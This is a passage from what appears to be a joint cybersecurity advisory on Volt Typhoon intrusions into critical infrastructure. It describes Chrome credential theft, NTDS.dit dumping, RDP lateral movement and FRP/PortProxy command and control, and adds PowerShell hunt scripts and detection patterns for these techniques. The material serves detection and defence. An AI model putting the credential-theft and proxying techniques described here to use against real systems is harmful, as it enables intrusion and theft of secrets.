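            $cmd = $_.Properties[8].Value
            if ($cmd -and $cmd -match $lotlRegex) {
                [pscustomobject]@{ Source = 'Security/4688'; User = $_.Properties[1].Value; Time = $_.TimeCreated; Line = $cmd }
            }
        }
}

Find-SuspiciousConsoleHistory
Find-SuspiciousProcessCreation
```

Expect noise from administrators who legitimately run ntdsutil or vssadmin; the discriminators are the account (a domain admin at 03:00 that normally works office hours), the destination path (C:\Users\Public, C:\Windows\Temp) and a matching 4688 on a host the account does not normally touch. Because the hunt runs in PowerShell, its own command line will appear in the history of the account that runs it.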
Volt Typhoon actors have been observed strategically targeting network administrator web browser data—focusing on both browsing history and stored credentials [T1555.003]—to facilitate targeting of personal email addresses (see the Reconnaissance section) for further discovery and possible network modifications that may impact the threat actor's persistence within victim networks. In one confirmed compromise:

- Volt Typhoon actors obtained the history file from the User Data directory of a network administrator user's Chrome browser. To obtain the history file, Volt Typhoon actors first executed an RDP session to the user's workstation where they initially attempted, and failed, to obtain the C$ File Name: users\{redacted}\appdata\local\Google\Chrome\UserData\default\History file, as evidenced by the accompanying 1016 (reopen failed) SMB error listed in the application event log. The threat actors then disconnected the RDP session to the workstation and accessed the file C:\Users\{redacted}\Downloads\History.zip. This file presumably contained data from the User Data directory of the user's Chrome browser, which the actors likely saved in the Downloads directory for exfiltration [T1074]. Shortly after accessing the History.zip file, the actors terminated RDP sessions.
- About four months later, Volt Typhoon actors accessed the same user's Chrome data C$ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Local State and C$ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Default\Login Data via SMB. The Local State file contains the Advanced Encryption Standard (AES) encryption key [T1552.004] used to encrypt the passwords stored in the Chrome browser, which would enable the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser. (That key is itself wrapped with the user's DPAPI master key, so recovering the plaintext additionally requires the user's DPAPI secrets or code execution in that user's context, both of which an actor holding domain admin credentials can arrange.)

In another confirmed compromise, Volt Typhoon actors accessed directories containing Chrome and Edge user data on multiple systems. Directory interaction was observed over the network to paths such as C:\Users\{redacted}\AppData\Local\Google\Chrome\User Data\ and C:\Users\{redacted}\AppData\Local\Microsoft\Edge\User Data\. They also enumerated several directories, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings [T1083].

Lateral Movement

For lateral movement, Volt Typhoon actors have been observed predominantly employing RDP with compromised valid administrator credentials. Note: With a full on-premises Microsoft Active Directory identity compromise (see the Credential Access section), the group may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement [T1550].

In one confirmed compromise of a Water and Wastewater Systems Sector entity, after obtaining initial access, Volt Typhoon actors connected to the network via a VPN with administrator credentials they obtained and opened an RDP session with the same credentials to move laterally. Over a nine-month period, they moved laterally to a file server, a domain controller, an Oracle Management Server (OMS), and a VMware vCenter server. The actors obtained domain credentials from the domain controller and performed discovery, collection, and exfiltration on the file server (see the Discovery and Collection and Exfiltration sections). Volt Typhoon's movement to the vCenter server was likely strategic for pre-positioning to OT assets. The vCenter server was adjacent to OT assets, and Volt Typhoon actors were observed interacting with the PuTTY application on the server by enumerating existing stored sessions. With this information, Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, OT systems, and network security devices. This would enable them to access these critical systems [T1563]. See Figure 2.
Figure 2: Volt Typhoon Lateral Movement Path: File Server, DC, and OT-Adjacent Assets

Additionally, Volt Typhoon actors have been observed using PsExec to execute remote processes, including the automated acceptance of the end-user license agreement (EULA) through an administrative account, signified by the accepteula command flag.

Volt Typhoon actors may have attempted to move laterally to a cloud environment in one victim's network, but direct attribution to the Volt Typhoon group was inconclusive. During the period of their known network presence, there were anomalous login attempts to an Azure tenant [T1021.007], potentially using credentials [T1078.004] previously compromised from theft of NTDS.dit. These attempts, coupled with misconfigured virtual machines with open RDP ports, suggested a potential for cloud-based lateral movement. However, subsequent investigations, including password changes and multifactor authentication (MFA) implementations, revealed authentication failures from non-associated IP addresses, with no definitive link to Volt Typhoon.

Collection and Exfiltration

The U.S. authoring agencies assess Volt Typhoon primarily collects information that would facilitate follow-on actions with physical impacts. For example, in one confirmed compromise, they collected [TA0009] sensitive information obtained from a file server in multiple zipped files [T1560] and likely exfiltrated [TA0010] the files via Server Message Block (SMB) [T1048] (see Figure 3). Collected information included diagrams and documentation related to OT equipment, including supervisory control and data acquisition (SCADA) systems, relays, and switchgear. This data is crucial for understanding and potentially impacting critical infrastructure systems, indicating a focus on gathering intelligence that could be leveraged in actions targeting physical assets and systems.

Figure 3: Volt Typhoon Attack Path for Exfiltration of Data from File Server

In another compromise, Volt Typhoon actors leveraged WMIC to create and use temporary directories (C:\Users\Public\pro, C:\Windows\Temp\tmp, C:\Windows\Temp\tmp\Active Directory, and C:\Windows\Temp\tmp\registry) to stage the ntds.dit and SYSTEM registry hives that ntdsutil had extracted from volume shadow copies on two DCs (see the Credential Access section). They then compressed and archived the extracted ntds.dit and accompanying registry files by executing ronf.exe, which was likely a renamed version of the archive utility rar.exe [T1560.001].

Command and Control

Volt Typhoon actors have been observed leveraging compromised SOHO routers and virtual private servers (VPS) to proxy C2 traffic. (For more information, see the DOJ press release U.S. Government Disrupts Botnet People's Republic of China Used to Conceal Hacking of Critical Infrastructure.) They have also been observed setting up FRP clients [T1090] on a victim's corporate infrastructure to establish covert communications channels [T1573] for command and control. In one instance, Volt Typhoon actors implanted the FRP client with filename SMSvcService.exe on a Shortel Enterprise Contact Center (ECC) server and a second FRP client with filename Brightmetricagent.exe on another server. These clients, when executed via PowerShell [T1059.001], open reverse proxies between the compromised system and Volt Typhoon C2 servers. Brightmetricagent.exe has additional capabilities: the FRP client can locate servers behind a network firewall or obscured through Network Address Translation (NAT) [T1016]. It also contains multiplexer libraries that can bi-directionally stream data over NAT networks and a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management Instrumentation (WMI), and Z Shell (zsh) [T1059.004]. See Appendix C and MAR-10448362-1.v1 for more information.

In the same compromise, Volt Typhoon actors exploited a Paessler Router Traffic Grapher (PRTG) server as an intermediary for their FRP operations. To facilitate this, they used the netsh command, a legitimate Windows command, to create a PortProxy registry modification [T1112] on the PRTG server [T1090.001]. This key alteration redirected specific port traffic to Volt Typhoon's proxy infrastructure, effectively converting the PRTG server into a proxy for their C2 traffic [T1584.004] (see Appendix B for details). PortProxy rules persist under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy and are serviced by the IP Helper service (iphlpsvc), so the listener shows up as a svchost.exe socket rather than as a distinct process; netsh interface portproxy show all lists any rules in place, and a monitoring server should normally have none.

DETECTION/HUNT RECOMMENDATIONS

Apply Living off the Land Detection Best Practices

Apply the prioritized detection and hardening best practice recommendations provided in the joint guide Identifying and Mitigating Living off the Land Techniques. Many organizations lack security and network management best practices (such as established baselines) that support detection of malicious LOTL activity—this makes it difficult for network defenders to discern legitimate behavior from malicious behavior and conduct behavior analytics, anomaly detection, and proactive hunting. Conventional IOCs associated with the malicious activity are generally lacking, complicating network defenders' efforts to identify, track, and categorize this sort of malicious behavior. This advisory provides guidance for a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.

Review Application, Security, and System Event Logs

Routinely review application, security, and system event logs, focusing on Windows Extensible Storage Engine Technology (ESENT) Application Logs.
Due to Volt Typhoon's ability for long-term undetected persistence, network defenders should assume significant dwell time and review specific application event log IDs, which remain on endpoints for longer periods compared to security event logs and other ephemeral artifacts. Focus on Windows ESENT logs because certain ESENT Application Log event IDs (216, 325, 326, and 327) may indicate actors copying NTDS.dit. Legitimate operations such as ntdsutil IFM media creation and some backup agents produce the same event IDs, so the database path in the event and the account that triggered it, rather than the event ID alone, decide whether the activity is suspicious. See Table 1 for examples of ESENT and other key log indicators that should be investigated. Please note that incidents may not always have exact matches listed in the Event Detail column due to variations in event logging and TTPs.

Table 1: Key Log Indicators for Detecting Volt Typhoon Activity

Event ID 216 (Windows ESENT Application Log)
  Event Detail: A database location change was detected from 'C:\Windows\NTDS\ntds.dit' to '\\?\GLOBALROOT\Device\{redacted}VolumeShadowCopy1\Windows\NTDS\ntds.dit'
  Description: A change in the NTDS.dit database location is detected. This could suggest an initial step in NTDS credential dumping where the database is being prepared for extraction.

Event ID 325 (Windows ESENT Application Log)
  Event Detail: The database engine created a new database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit).
  Description: Indicates creation of a new NTDS.dit file in a non-standard directory. Often a sign of data staging for exfiltration. Monitor for unusual database operations in temp directories.

Event ID 637 (Windows ESENT Application Log)
  Event Detail: C:\Windows\Temp\tmp\Active Directory\ntds.jfm-++- (0) New flush map file "C:\Windows\Temp\tmp\Active Directory\ntds.jfm" will be created to enable persisted lost flush detection.
  Description: A new flush map file is being created for NTDS.dit. This may suggest ongoing operations related to NTDS credential dumping, potentially capturing uncommitted changes to the NTDS.dit file.

Event ID 326 (Windows ESENT Application Log)
  Event Detail: NTDS-++-12460,D,100-++--++-1-++- C:\$SNAP_{redacted}_VOLUMEC$\Windows\NTDS\ntds.dit-++-0-++- [1] The database engine attached a database. (Began mounting of the C:\Windows\NTDS\ntds.dit file created from the volume shadow copy process.)
  Description: Represents the mounting of an NTDS.dit file from a volume shadow copy. This is a critical step in NTDS credential dumping, indicating active manipulation of a domain controller's data.

Event ID 327 (Windows ESENT Application Log)
  Event Detail: C:\Windows\Temp\tmp\Active Directory\ntds.dit-++-1-++- [1] The database engine detached a database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit). (Completion of mounting of the ntds.dit file to C:\Windows\Temp\tmp\Active Directory.)
  Description: The detachment of a database, particularly in a temp directory, could indicate the completion of a credential dumping process, potentially as part of exfiltration preparations.

Event ID 21 (Windows Terminal Services Local Session Manager Operational Log)
  Event Detail: Remote Desktop Services: Session logon succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}
  Description: Successful authentication to a Remote Desktop Services session.

Event ID 22 (Windows Terminal Services Local Session Manager Operational Log)
  Event Detail: Remote Desktop Services: Shell start notification received: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}
  Description: Successful start of a new Remote Desktop session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected.

Event ID 23 (Windows Terminal Services Local Session Manager Operational Log)
  Event Detail: Remote Desktop Services: Session logoff succeeded: User: {redacted}\{redacted} Session ID: {redacted}
  Description: Successful logoff of Remote Desktop session.

Event ID 24 (Windows Terminal Services Local Session Manager Operational Log)
  Event Detail: Remote Desktop Services: Session has been disconnected: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}
  Description: Remote Desktop session disconnected by user or due to network connectivity issues.

Event ID 25 (Windows Terminal Services Local Session Manager Operational Log)
  Event Detail: Remote Desktop Services: Session reconnection succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}
  Description: Successful reconnection to a Remote Desktop Services session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected.

Event ID 1017 (Windows System Log)
  Event Detail: Handle scavenged. Share Name: C$ File Name: users\{redacted}\downloads\History.zip Durable: 1 Resilient or Persistent: 0 Guidance: The server closed a handle that was previously reserved for a client after 60 seconds.
  Description: Indicates the server closed a handle for a client. While common in network operations, unusual patterns or locations (like History.zip in a user's downloads) may suggest data collection from a local system.

Event ID 1102 (Windows Security Log)
  Event Detail: All
  Description: All Event ID 1102 entries should be investigated, as logs are generally not cleared and this is a known Volt Typhoon tactic to cover their tracks.

Monitor and Review OT System Logs

- Review access logs for communication paths between IT and OT networks, looking for anomalous accesses or protocols.
- Measure the baseline of normal operations and network traffic for the industrial control system (ICS) and assess traffic anomalies for malicious activity. Configure intrusion detection systems (IDS) to create alarms for any ICS network traffic outside normal operations.
- Track and monitor audit trails on critical areas of ICS.
- Set up security incident and event monitoring (SIEM) to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.

Review CISA's Recommended Cybersecurity Practices for Industrial Control Systems and the joint advisory, NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, for further OT system detection and mitigation guidance.
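The Table 1 indicators can be collected from a domain controller with the following PowerShell hunt. It is an added example rather than a CISA script, and assumes an elevated session on the domain controller (or a remote one via -ComputerName), the default log names, the ESENT provider name "ESENT", and English message text, because the fields are parsed from the rendered message rather than from the event XML.

```powershell
# Added example, not part of the advisory. Pulls the Table 1 indicators from a domain controller.
# Assumptions: elevated session, default log names, ESENT provider name "ESENT", English message text
# (fields are parsed from the message, not from the event XML).
param(
    [string]$ComputerName = $env:COMPUTERNAME,
    [int]$LookbackDays = 365      # assume long dwell time; go back as far as the logs reach
)
$since = (Get-Date).AddDays(-$LookbackDays)

function Get-NtdsEsentEvents {
    # 216/325/326/327/637 also fire for legitimate ntdsutil ifm backups; the giveaway is the path:
    # a VolumeShadowCopy device path, a $SNAP_ path, or a Temp/Public staging directory.
    $filter = @{ LogName = 'Application'; ProviderName = 'ESENT'; Id = 216, 325, 326, 327, 637; StartTime = $since }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'ntds\.(dit|jfm)' -and
                       $_.Message -match 'VolumeShadowCopy|\$SNAP_|\\Temp\\|\\Users\\Public\\' } |
        Select-Object TimeCreated, Id, @{ n = 'Detail'; e = { ($_.Message -split "`r?`n")[0] } }
}

function Get-RdpSessionEvents {
    # 21 logon, 22 shell start, 24 disconnect, 25 reconnect (Table 1); 23 logoff omitted as low value.
    $filter = @{ LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'; Id = 21, 22, 24, 25; StartTime = $since }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $user = $null; $src = $null
            if ($_.Message -match 'User:\s*(\S+)') { $user = $Matches[1] }
            if ($_.Message -match 'Source Network Address:\s*(\S+)') { $src = $Matches[1] }
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; Id = $_.Id; User = $user; Source = $src }
        }
}

function Get-LogClearedEvents {
    # Security 1102: every occurrence is worth a ticket; the subject is the account that cleared the log.
    $filter = @{ LogName = 'Security'; Id = 1102; StartTime = $since }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $who = 'unknown'
            if ($_.Message -match 'Account Name:\s*(\S+)') { $who = $Matches[1] }
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; ClearedBy = $who }
        }
}

function Get-SmbHandleScavengedEvents {
    # System 1017 "Handle scavenged" naming a profile path on C$ (the History.zip entry in Table 1).
    $filter = @{ LogName = 'System'; Id = 1017; StartTime = $since }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Share Name:\s*C\$' -and $_.Message -match 'File Name:\s*users\\' } |
        ForEach-Object {
            $file = $null
            if ($_.Message -match 'File Name:\s*(\S+)') { $file = $Matches[1] }
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; File = $file }
        }
}

'== NTDS.dit handled outside %SystemRoot%\NTDS (ESENT 216/325/326/327/637) =='
Get-NtdsEsentEvents | Format-Table -AutoSize
'== RDP sessions by source address (investigate sources that are not admin jump hosts) =='
Get-RdpSessionEvents | Group-Object Source | Sort-Object Count -Descending | Select-Object Count, Name
'== Security log cleared (1102) =='
Get-LogClearedEvents
'== SMB handle scavenged on profile paths (1017) =='
Get-SmbHandleScavengedEvents
```

Get-WinEvent raises a non-terminating "no events found" error when a filter matches nothing, which -ErrorAction SilentlyContinue suppresses; an empty section therefore means no hits, not a broken query. Correlate an ESENT hit with the RDP events around the same timestamp: an NTDS.dit path under a shadow copy, within minutes of an event 21 from an address that is not a known administrative host, is the sequence described under Credential Access.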
Use gait to Detect Possible Network Proxy Activities

Use gait[4] to detect network proxy activities. Developed by Sandia National Labs, gait is a publicly available Zeek[5] extension. The gait extension can help enrich Zeek's network connection monitoring and SSL logs by including additional metadata in the logs. Specifically, gait captures unique TCP options and timing data such as TCP, transport layer security (TLS), and Secure Shell (SSH) layer inferred round trip times (RTT), aiding in the identification of the software used by both endpoints and intermediaries.

While the gait extension for Zeek is an effective tool for enriching network monitoring logs with detailed metadata, it is not specifically designed to detect Volt Typhoon actor activities. The extension's capabilities extend to general anomaly detection in network traffic, including—but not limited to—proxying activities. Therefore, while gait can be helpful in identifying tactics similar to those used by Volt Typhoon, such as proxy networks and FRP clients for C2 communication, not all proxying activities detected by using this additional metadata are necessarily indicative of Volt Typhoon presence. It serves as a valuable augmentation to current security stacks for a broader spectrum of threat detection. For more information, see Sandia National Lab's gait GitHub page sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies.

Review Logins for Impossible Travel

Examine VPN or other account logon times, frequency, duration, and locations. Logons from two geographically distant locations within a short timeframe from a single user may indicate an account is being used maliciously. Logons of unusual frequency or duration may indicate a threat actor attempting to access a system repeatedly or maintain prolonged sessions for the purpose of data extraction.
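One way to implement the impossible-travel check above, as an added example rather than anything from the advisory: compute the speed a user would have needed to cover the distance between the geolocated source addresses of two consecutive logons, and flag anything faster than an airliner. The logon records are constructed sample data using documentation (TEST-NET) addresses and assumed coordinates; in practice the records come from the VPN concentrator or identity provider, with source addresses geolocated by whatever database the organization uses.

```powershell
# Added example, not part of the advisory. Flags "impossible travel": consecutive logons by one user
# whose geolocated sources are too far apart for the elapsed time. Sample records are constructed
# (documentation addresses, assumed coordinates); real input comes from the VPN/IdP logs.

function Get-DistanceKm {
    # Great-circle distance (haversine) between two latitude/longitude pairs, in kilometres.
    param([double]$Lat1, [double]$Lon1, [double]$Lat2, [double]$Lon2)
    $toRad = [math]::PI / 180
    $dLat  = ($Lat2 - $Lat1) * $toRad
    $dLon  = ($Lon2 - $Lon1) * $toRad
    $a = [math]::Pow([math]::Sin($dLat / 2), 2) +
         [math]::Cos($Lat1 * $toRad) * [math]::Cos($Lat2 * $toRad) * [math]::Pow([math]::Sin($dLon / 2), 2)
    return 2 * 6371.0 * [math]::Asin([math]::Sqrt($a))
}

function Find-ImpossibleTravel {
    param(
        [Parameter(Mandatory)][object[]]$Logons,   # objects with User, Time, SourceIp, Lat, Lon
        [double]$MaxSpeedKmh = 900                 # faster than a commercial flight: nobody moved that way
    )
    $Logons | Group-Object User | ForEach-Object {
        $events = @($_.Group | Sort-Object Time)
        for ($i = 1; $i -lt $events.Count; $i++) {
            $prev = $events[$i - 1]
            $cur  = $events[$i]
            $hours = ($cur.Time - $prev.Time).TotalHours
            if ($hours -lt (1 / 3600)) { $hours = 1 / 3600 }          # same-second logons: avoid divide by zero
            $km    = Get-DistanceKm $prev.Lat $prev.Lon $cur.Lat $cur.Lon
            $speed = $km / $hours
            if ($speed -gt $MaxSpeedKmh) {
                [pscustomobject]@{
                    User = $_.Name; From = $prev.SourceIp; To = $cur.SourceIp; At = $cur.Time
                    Km = [math]::Round($km); Hours = [math]::Round($hours, 2); Kmh = [math]::Round($speed)
                }
            }
        }
    }
}

# Constructed sample: jdoe logs on from a source near Ashburn, VA, then 45 minutes later from a
# source near San Francisco (~3,900 km). asmith's two logons are a day apart and ~40 km apart.
$sample = @(
    [pscustomobject]@{ User = 'jdoe';   Time = [datetime]'2024-01-10T08:00:00'; SourceIp = '203.0.113.10'; Lat = 39.04; Lon = -77.49 }
    [pscustomobject]@{ User = 'jdoe';   Time = [datetime]'2024-01-10T08:45:00'; SourceIp = '198.51.100.7'; Lat = 37.77; Lon = -122.42 }
    [pscustomobject]@{ User = 'asmith'; Time = [datetime]'2024-01-10T09:00:00'; SourceIp = '203.0.113.11'; Lat = 39.04; Lon = -77.49 }
    [pscustomobject]@{ User = 'asmith'; Time = [datetime]'2024-01-11T09:05:00'; SourceIp = '203.0.113.12'; Lat = 38.90; Lon = -77.04 }
)
Find-ImpossibleTravel -Logons $sample | Format-Table -AutoSize   # flags only jdoe's second logon
```

Two caveats matter for this actor. Volt Typhoon proxies through SOHO routers in the victim's own region specifically so that the source looks local, so a clean impossible-travel result is not evidence of absence. And a user legitimately connected through a corporate or consumer VPN will generate false positives, so exclude known egress ranges before alerting and treat the output as a lead for the RDP and ESENT correlation rather than as a verdict.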
Review Standard Directories for Unusual Files

Review directories, such as C:\windows\temp\ and C:\users\public\, for unexpected or unusual files. Monitor these temporary file storage directories for files typically located in standard system paths, such as the System32 directory. For example, Volt Typhoon has been observed downloading comsvcs.dll to a non-standard folder (this file is normally found in the System32 folder).

INCIDENT RESPONSE

If compromise, or potential compromise, is detected, organizations should assume full domain compromise because of Volt Typhoon's known behavioral pattern of extracting the NTDS.dit from the DCs. Organizations should immediately implement the following defensive countermeasures:

• Sever the enterprise network from the internet. Note: This step requires the agency to understand its internal and external connections. When making the decision to sever internet access, knowledge of connections must be combined with care to avoid disrupting critical functions. If you cannot sever from the internet, shut down all non-essential traffic between the affected enterprise network and the internet.
• Reset credentials of privileged and non-privileged accounts within the trust boundary of each compromised account.
  ◦ Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. The krbtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The krbtgt account should be reset twice because the account has a two-password history. The first account reset for the krbtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA's Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to FCEB agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise.
  ◦ Review access policies to temporarily revoke privileges/access for affected accounts/devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to "contain" them.
  ◦ Reset the relevant account credentials or access keys if the investigation finds the threat actor's access is limited to non-elevated permissions.
  ◦ Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access.
• Audit all network appliance and edge device configurations with indicators of malicious activity for signs of unauthorized or malicious configuration changes. Organizations should ensure they audit the current network device running configuration and any local configurations that could be loaded at boot time. If configuration changes are identified:
  ◦ Change all credentials being used to manage network devices, to include keys and strings used to secure network device functions (SNMP strings/user credentials, IPsec/IKE preshared keys, routing secrets, TACACS/RADIUS secrets, RSA keys/certificates, etc.).
  ◦ Update all firmware and software to the latest version.
• Report the compromise to an authoring agency (see the Contact Information section).
• For organizations with cloud or hybrid environments, apply best practices for identity and credential access management.
  ◦ Verify that all accounts with privileged role assignments are cloud native, not synced from Active Directory.
  ◦ Audit conditional access policies to ensure Global Administrators and other highly privileged service principals and accounts are not exempted.
  ◦ Audit privileged role assignments to ensure adherence to the principle of least privilege when assigning privileged roles.
  ◦ Leverage just-in-time and just-enough access mechanisms when administrators need to elevate to a privileged role.
  ◦ In hybrid environments, ensure federated systems (such as AD FS) are configured and monitored properly.
  ◦ Audit Enterprise Applications for recently added applications and examine the API permissions assigned to each.
• Reconnect to the internet. Note: The decision to reconnect to the internet depends on senior leadership's confidence in the actions taken. It is possible, depending on the environment, that new information discovered during pre-eviction and eviction steps could add additional eviction tasks.
• Minimize and control use of remote access tools and protocols by applying best practices from the joint Guide to Securing Remote Access Software and the joint Cybersecurity Information Sheet: Keeping PowerShell: Security Measures to Use and Embrace.
• Consider sharing technical information with an authoring agency and/or a sector-specific information sharing and analysis center.

For more information on incident response and remediation, see:
• Joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity. This advisory provides incident response best practices.
• CISA's Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to U.S. Federal Civilian Executive Branch (FCEB) agencies, the playbooks are applicable to all organizations. The incident response playbook provides procedures to identify, coordinate, remediate, recover, and track successful mitigations from incidents.
• Joint Water and Wastewater Sector – Incident Response Guide. This joint guide provides incident response best practices and information on federal resources for Water and Wastewater Systems Sector organizations.

MITIGATIONS

These mitigations are intended for IT administrators in critical infrastructure organizations.
The authoring agencies recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to strengthen the security posture for their customers. For information on secure by design practices that may protect customers against common Volt Typhoon techniques, see the joint guide Identifying and Mitigating Living off the Land Techniques and the joint Secure by Design Alert Security Design Improvements for SOHO Device Manufacturers. For more information on secure by design, see CISA's Secure by Design webpage and joint guide.

The authoring agencies recommend organizations implement the mitigations below to improve their cybersecurity posture on the basis of Volt Typhoon activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

IT Network Administrators and Defenders

Harden the Attack Surface

• Apply patches for internet-facing systems within a risk-informed span of time [CPG 1E]. Prioritize patching critical assets, known exploited vulnerabilities, and vulnerabilities in appliances known to be frequently exploited by Volt Typhoon (e.g., Fortinet, Ivanti, NETGEAR, Citrix, and Cisco devices).
• Apply vendor-provided or industry standard hardening guidance to strengthen software and system configurations. Note: As part of CISA's Secure by Design campaign, CISA urges software manufacturers to prioritize secure by default configurations to eliminate the need for customer implementation of hardening guidelines.
• Maintain and regularly update an inventory of all organizational IT assets [CPG 1A].
• Use third party assessments to validate current system and network security compliance via security architecture reviews, penetration tests, bug bounties, attack surface management services, incident simulations, or table-top exercises (both announced and unannounced) [CPG 1F].
• Limit internet exposure of systems when not necessary. An organization's primary attack surface is the combination of the exposure of all its internet-facing systems. Decrease the attack surface by not exposing systems or management interfaces to the internet when not necessary.
• Plan "end of life" for technology beyond the manufacturer-supported lifecycle. Inventories of organizational assets should be leveraged in patch and configuration management as noted above. Inventories will also enable identification of technology beyond the manufacturer's supported lifecycle. Where technology is beyond "end of life" or "end of support," additional cybersecurity vigilance is necessary, and may warrant one or more of the following:
  ◦ Supplemental support agreements;
  ◦ Additional scanning and testing;
  ◦ Configuration changes;
  ◦ Isolation;
  ◦ Segmentation; and
  ◦ Development of forward-looking plans to facilitate replacement.

Secure Credentials

• Do not store credentials on edge appliances/devices. Ensure edge devices do not contain accounts that could provide domain admin access.
• Do not store plaintext credentials on any system [CPG 2L]. Credentials should be stored securely, such as with a credential/password manager or vault, or other privileged account management solutions, so they can only be accessed by authenticated and authorized users.
• Change default passwords [CPG 2A] and ensure they meet the policy requirements for complexity.
• Implement and enforce an organizational system-enforced policy that:
  ◦ Requires passwords for all IT password-protected assets to be at least 15 characters;
  ◦ Does not allow users to reuse passwords for accounts, applications, services, etc. [CPG 2C]; and
  ◦ Does not allow service accounts/machine accounts to reuse passwords from member user accounts.
• Configure Group Policy settings to prevent web browsers from saving passwords and disable autofill functions.
• Disable the storage of clear text passwords in LSASS memory.

Secure Accounts

• Implement phishing-resistant MFA for access to assets [CPG 2H].
• Separate user and privileged accounts. User accounts should never have administrator or super-user privileges [CPG 2E]. Administrators should never use administrator accounts for actions and activities not associated with the administrator role (e.g., checking email, web browsing).
• Enforce the principle of least privilege. Ensure administrator accounts only have the minimum permissions necessary to complete their tasks.
  ◦ Review account permissions for default accounts on edge appliances/devices and remove domain administrator privileges, if identified.
  ◦ Significantly limit the number of users with elevated privileges. Implement continuous monitoring for changes in group membership, especially in privileged groups, to detect and respond to unauthorized modifications.
  ◦ Remove accounts from high-privilege groups like Enterprise Admins and Schema Admins. Temporarily reinstate these privileges only when necessary and under strict auditing to reduce the risk of privilege abuse.
  ◦ Transition to Group Managed Service Accounts (gMSAs) where suitable for enhanced management and security of service account credentials. gMSAs provide automated password management and simplified Service Principal Name (SPN) management, enhancing security over traditional service accounts. See Microsoft's Group Managed Service Accounts Overview.
  ◦ Enforce strict policies via Group Policy and User Rights Assignments to limit high-privilege service accounts.
• Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 2L]. PAM solutions can also log and alert on usage to detect any unusual activity.
  ◦ Complement the PAM solution with role-based access control (RBAC) for tailored access based on job requirements. This ensures that elevated access is granted only when required and for a limited duration, minimizing the window of opportunity for abuse or exploitation of privileged credentials.
• Implement an Active Directory tiering model to segregate administrative accounts based on their access level and associated risk. This approach reduces the potential impact of a compromised account. See Microsoft's PAM environment tier model.
• Harden administrative workstations to only permit administrative activities from workstations appropriately hardened based on the administrative tier. See Microsoft's Why are privileged access devices important – Privileged access.
• Disable all user accounts and access to organizational resources of employees on the day of their departure [CPG 2G].
• Regularly audit all user, admin, and service accounts and remove or disable unused or unneeded accounts as applicable.
• Regularly roll NTLM hashes of accounts that support token-based authentication.
• Improve management of hybrid (cloud and on-premises) identity federation by:
  ◦ Using cloud-only administrators that are not synchronized with on-premises environments and ensuring on-premises administrators are not synchronized to the cloud.
  ◦ Using CISA's SCuBAGear tool to discover cloud misconfigurations in Microsoft cloud tenants. SCuBAGear is an automation script for comparing Federal Civilian Executive Branch (FCEB) agency tenant configurations against CISA M365 baseline recommendations. SCuBAGear is part of CISA's Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. For more information on SCuBAGear, see CISA's Secure Cloud Business Applications (SCuBA) Project.
  ◦ Using endpoint detection and response capabilities to actively defend on-premises federation servers.

Secure Remote Access Services

• Limit the use of RDP and other remote desktop services. If RDP is necessary, apply best practices, including auditing the network for systems using RDP, closing unused RDP ports, and logging RDP login attempts.
• Disable Server Message Block (SMB) protocol version 1 and upgrade to version 3 (SMBv3) after mitigating existing dependencies (on existing systems or applications), as they may break when disabled.
• Harden SMBv3 by implementing guidance included in the joint #StopRansomware Guide (see page 8 of the guide).
• Apply mitigations from the joint Guide to Securing Remote Access Software.

